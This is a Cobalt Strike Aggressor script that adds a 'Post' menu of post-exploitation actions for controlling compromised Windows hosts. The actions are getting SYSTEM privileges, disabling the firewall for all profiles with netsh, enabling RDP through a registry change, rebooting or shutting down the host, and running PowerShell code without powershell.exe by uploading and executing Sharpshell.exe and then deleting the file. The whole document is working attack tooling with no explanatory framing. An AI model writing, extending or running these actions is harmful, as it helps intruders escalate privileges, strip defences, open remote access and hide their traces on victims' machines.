#define functions

sub Exec_sharpshell{
    local('$fpath $last $fname');
    $fpath = $3['file'];
    $last = lindexOf($fpath, "\\");
    $fname = substr($fpath,$last + 1,);
    bupload($bid, $fpath);
    bexecute_assembly($bid, script_resource("post/Sharpshell.exe"), "\"".$fname."\"");
    bshell($bid,"del /F /S /Q $fname");
}

#append menus



    menu "Post"{
            item "Get &SYSTEM" {
                binput($1, "getsystem");
                bgetsystem($1);
            }

            item "Turn Off Firewall"{
                if (!-isadmin $1['@']){
                    show_error("Permission Denied!");
                }
                else{
                    bshell($1, "cmd.exe /C netsh advfirewall set allprofiles state off");
                }
            }

            item "Enable RDP"{
                local('$bid');
                $bid = $1;
                if (!-isadmin $bid['@']){
                    show_error("Permission Denied!");
                }
                else{
                    bshell($bid,"REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal\" \"Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f");
                }
            }

            menu "Power"{
                item "Restart"{
                    bshell($1,"shutdown -r -t 0");
                }
                item "Power off"{
                    bshell($1,"shutdown -s -t 0");
                }
            }
            
            item "Sharpshell"{
                $bid = $1['@'];
                $dialog = dialog("SharpShell",%(bid => $bid), &Exec_sharpshell);
                dialog_description($dialog, "Execute powershell code without powershell.");
                drow_file($dialog, "file", "Choose: ");
                dbutton_action($dialog, "Go");
                dialog_show($dialog); 
            }
    }
